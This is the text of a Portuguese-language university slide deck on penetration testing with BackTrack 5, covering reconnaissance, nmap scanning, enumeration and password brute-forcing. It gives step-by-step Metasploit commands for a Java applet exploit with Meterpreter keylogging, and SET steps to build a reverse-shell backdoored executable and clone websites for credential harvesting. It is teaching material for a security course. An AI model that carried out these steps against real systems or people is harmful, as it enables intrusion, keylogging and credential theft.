Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.
5. Introdução
O que é?
• Ferramenta voltada para testes de
penetração;
• Primeira versão lançada em 2006;
• Possui mais de 300 ferramentas para
tais testes;
6. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:
http://www.backtrack-linux.org/
8. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:
http://www.backtrackbrasil.com.br/site/vd/
10. Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.
Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;
• Abordaremos as três primeiras etapas
divididas em quatro partes;
11. Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.
Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;
• Abordaremos as três primeiras etapas
divididas em quatro partes;
13. Obtenção de Informação
• Metodologia usada para "reconhecimento do
terreno";
• Pode ser de forma:
passiva (recursos na internet);
ativa (engenharia social);
16. Detecção de
Sistemas Ativos
FPING:
Executa ping para diferentes hosts ao
mesmo tempo através de um *.txt;
HPING3:
Detecta hosts, regras de firewall e realiza
varreduras de portas;
Genlist:
Verifica uma lista de hosts ativos;
17. Informações DNS
• DNS traduz endereços de IP em
nomes de domínio;
• A ferramenta nslookup permite obter
informações sobre DNS;
18.
19. Informações DNS
DNSENUM:
Pesquisa de hosts, nomes de servidores, registros MX, IPs,
etc.
DNSMAP:
Descobre subdomínios relacionados ao domínio-alvo.
Acompanha wordlist;
DNSRECON:
Permite consultas reversas por faixas de IP, NS, SOA, registros
MX, transferências de zonas e enumeração de serviços;
FIERCE:
Retorna informações adicionais como HINFO, especificando o
processador da máquina e o servidor;
20. FINGERPRINT
• Técnica na qual se obtém informações
sobre sistema operacional;
• O NMAP é utilizado para tal checagem
de versões;
root@bt~# nmap –O <ip_do_alvo>
21. FINGERPRINT
TCP SYN (-sS)
examina portas de maneira rápida e difícil de
ser detectado por firewalls ou IDS;
TCP Connect (-sT)
executa varredura utilizando o Three-Way
Handshake;
UDP (-sU)
possibilita varredura do protocolo UDP;
22. FINGERPRINT
TCP FIN (-sF, -sX, -sN)
utilizados na tentativa de travessia de
firewalls;
TCP ACK (-sA)
tática utilizada para detecção de regras de
firewall;
TCP Windows (-sW)
varreduras por janelas, parecido com o método
ACK, porém consegue detectar portas abertas
versus filtradas e não filtradas;
24. SCANNING de portas
• Port Scan é a técnica usada para descobrir
serviços vulneráveis em um sistema;
Scanning de portas:
identifica portas ativas;
De vulnerabilidades:
identifica fraquezas no sistema;
De redes:
identifica os hosts ativos;
28. Fase de Enumeração
• Nesta fase o invasor tenta obter:
nomes de máquinas;
usuários;
serviços e versões;
compartilhamentos, etc;
• A ferramenta Nbtscan nos permite obter
nome e endereço MAC de um alvo;
29. Fase de Enumeração
• Através do nmap podemos executar
varredura procurando por serviços que
utilizem o protocolo UDP:
root@root~# nmap –T4 –sU –sV
<ip_host_alvo>
30. Fase de Enumeração
• Obtendo retorno de serviços snmp
podemos obter informações SNMP
com o Snmpcheck:
root@root:/pentest/enumeration/sn
mp/snmpcheck# ./snmpcheck-1.8.pl
–t <ip_host_alvo>
34. AMAP, SMTP e SMTPSCAN
AMAP
tenta identificar aplicações rodando em
portas diferentes da usual.
SMTP e SMTPScan
busca usuários válidos do nosso host,
destinando um IP alvo;
36. Ganho de Acesso
• Utiliza de ferramentas que explorem
serviços como FTP e SSH;
• Explora vulnerabilidades e senhas;
• A técnica de engenharia social é
extremamente importante em tal etapa;
37. Força Bruta
xHydra ou Hidra-GTK
Ferramenta utilizada para quebra de senhas
ONLINE;
Suporta diversos protocolos;
Permite utilização de arquivos auxiliares
para listas de usuários e senhas (wordlists);
38. Força Bruta
• Dicionários e força bruta são técnicas
utilizadas para o password cracking;
• Outras ferramentas para o mesmo intuito
são:
Medusa;
John The Ripper;
Todas elas inclusas no BackTrack 5 R3;
39. Invadindo Sistemas com
SET e Metasploit
Metasploit
Conta com uma interface gráfica
ARMITAGE e também a linha de
comando, MSFCONSOLE;
SET
Tem como alvo fraquezas e estupidez
humanas;
40. Invadindo Sistemas com
SET e Metasploit
• Através do comando msfconsole
acessamos o Metasploit via linha de
comando;
• Configuraremos nossa máquina
BackTrack para receber informações
do alvo através de uma vulnerabilidade
do Java;
42. Invadindo Sistemas com
SET e Metasploit
• root@bt:~# msfconsole
• root@bt:~# search java
• root@bt:~# use
exploit/multi/browser/java_sign
ed_applet
• root@bt:~# show options
43. Invadindo Sistemas com
SET e Metasploit
set srvhost <ip_local_host_backTrack>
set srvport 80
#seta a porta 80 como acesso
set uripath <caminho_para_link_url>
set appletname <nome_para_o_arquivo_jar>
exploit
44. Invadindo Sistemas com
SET e Metasploit
• Após acessar a URL gerada o alvo
permitirá acesso ao invasor;
sessions –i 1
# dá acesso à máquina alvo
sysinfo
# obtém informações da máquina
alvo
45. Invadindo Sistemas com
SET e Metasploit
help
# lista comandos do METERPRETER
screenshot
# obtém um print da tela da
máquina invadida
46. Invadindo Sistemas com
SET e Metasploit
keyscan_start
# starta um sniffer para captura
de navegação
keyscan_dump
# exibe informações capturadas
47. Invadindo Sistemas com
SET e Metasploit
• Técnica semelhante pode ser
explorada através da ferramenta SET
gerando-se um payload;
• Ao acessar a ferramenta, navega-se
em:
1 – Social Engineering Attacks;
4 – Create a Payload na Listener;
48. Invadindo Sistemas com
SET e Metasploit
• Deve-se informar o IP da máquina que
receberá as informações obtidas através
do payload (IP da máquina BackTrack);
• Feito isso, navega-se em:
2 – Windows Reverse TCP Meterpreter;
16 – Backdoored Executable (BEST);
49. Invadindo Sistemas com
SET e Metasploit
• Após informar a porta solicitada, ele gerará o
arquivo executável:
/pentest/exploits/set msf.exe
• Confirma-se com yes o start do listener;
• O acesso à máquina alvo se dará após a
execução do arquivo pela mesma e
executando:
sessions –i 1.
50. Invadindo Sistemas com
SET e Metasploit
• Com a mesma ferramenta SET,
podemos clonar páginas web para
obter informações de uma vítima
através das opções:
1
2
3
2
–
–
–
–
Social Engineering Attacks;
Website Attack Vectors;
Credential Harvester Attack Vectors;
Site Cloner;
51. Invadindo Sistemas com
SET e Metasploit
• Informa-se a URL do site a ser
clonado;
• Acessa-se através do IP da máquina
do atacante;
Obs.: Podemos atribuir um domínio ao IP para
facilitar o acesso pela vítima;
52. Conclusão
• Técnicas de invasão estão
diretamente atreladas às
vulnerabilidades dos sistemas e das pessoas